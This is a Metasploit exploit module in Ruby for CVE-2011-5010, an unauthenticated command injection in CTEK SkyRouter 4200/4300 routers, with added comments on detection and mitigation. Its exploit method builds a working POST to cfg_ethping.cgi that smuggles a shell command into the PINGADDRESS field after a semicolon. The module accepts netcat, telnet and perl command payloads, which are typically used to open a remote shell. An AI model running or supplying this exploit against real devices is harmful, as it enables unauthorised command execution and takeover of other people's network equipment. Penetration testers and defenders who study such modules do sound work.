Path: blob/master/modules/exploits/unix/http/ctek_skyrouter.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit module for the CTEK SkyRouter 4200/4300 issue tracked as
# CVE-2011-5010 / OSVDB 77497.
#
# What the code below shows: a single POST is sent to
# /apps/a3/cfg_ethping.cgi in which the PINGADDRESS form field carries a
# `;` followed by a command string. No credentials, cookie or session are
# attached to the request, which matches the "unauthenticated" wording in
# the module description. Presumably the CGI hands PINGADDRESS to a shell
# without validation; the device-side code is not visible here.
#
# Defender notes, derived from the request this module builds:
# - Detection: a PINGADDRESS value posted to cfg_ethping.cgi that is not a
#   plain hostname or IP address (for example one containing `;` or `&`)
#   is not normal ping-diagnostic traffic and is worth alerting on.
# - Mitigation: keep the router's web management interface unreachable
#   from untrusted networks. Whether fixed firmware exists is not stated
#   on this page; check the vendor advisory for the CVE.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata with the framework.
  #
  # info - Hash of caller-supplied metadata that update_info combines with
  #        the values declared here.
  def initialize(info = {})
    # Only command-style payloads are accepted, capped at 1024 bytes.
    payload_constraints = {
      'DisableNops' => true,
      'Space' => 1024,
      'Compat' => {
        'PayloadType' => 'cmd',
        'RequiredCmd' => 'generic perl telnet netcat netcat-e'
      }
    }

    # Reliability, stability and side effects have not been assessed.
    module_notes = {
      'Reliability' => UNKNOWN_RELIABILITY,
      'Stability' => UNKNOWN_STABILITY,
      'SideEffects' => UNKNOWN_SIDE_EFFECTS
    }

    super(
      update_info(
        info,
        'Name' => 'CTEK SkyRouter 4200 and 4300 Command Execution',
        'Description' => %q{
          This module exploits an unauthenticated remote root exploit within ctek SkyRouter 4200 and 4300.
        },
        'Author' => [ 'savant42' ], # with module help from kos
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2011-5010'],
          ['OSVDB', '77497']
        ],
        # NOTE(review): the description speaks of root, yet 'Privileged' is
        # false -- confirm which of the two is accurate.
        'Privileged' => false,
        'Payload' => payload_constraints,
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Targets' => [[ 'Automatic', {}]],
        'DisclosureDate' => '2011-09-08', # CGI historical date :)
        'DefaultTarget' => 0,
        'Notes' => module_notes
      )
    )
  end

  # Sends the one POST request described in the class comment, reports
  # whether the server answered, then hands control to the payload handler.
  def exploit
    encoded_cmd = Rex::Text.uri_encode(payload.encoded)
    # Form body as sent on the wire; the trailing "+%26" is the URL-encoded
    # form of " &". This PINGADDRESS shape is what a detection rule for the
    # CGI should match on.
    form_body = "MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;" + encoded_cmd + "+%26"
    cgi_path = '/apps/a3/cfg_ethping.cgi'
    print_status("Sending HTTP request for #{cgi_path}")

    # NOTE(review): the effect of 'global' is not visible in this file.
    request_opts = {
      'global' => true,
      'uri' => cgi_path,
      'method' => "POST",
      'data' => form_body
    }
    # The second argument is the response timeout in seconds.
    response = send_request_cgi(request_opts, 30)

    # A nil response means nothing came back within the timeout. Only the
    # status code is reported; the response body is never inspected.
    outcome = if response
                "The server responded with HTTP CODE #{response.code}"
              else
                "The server did not respond to our request"
              end
    print_status(outcome)

    handler
  end
end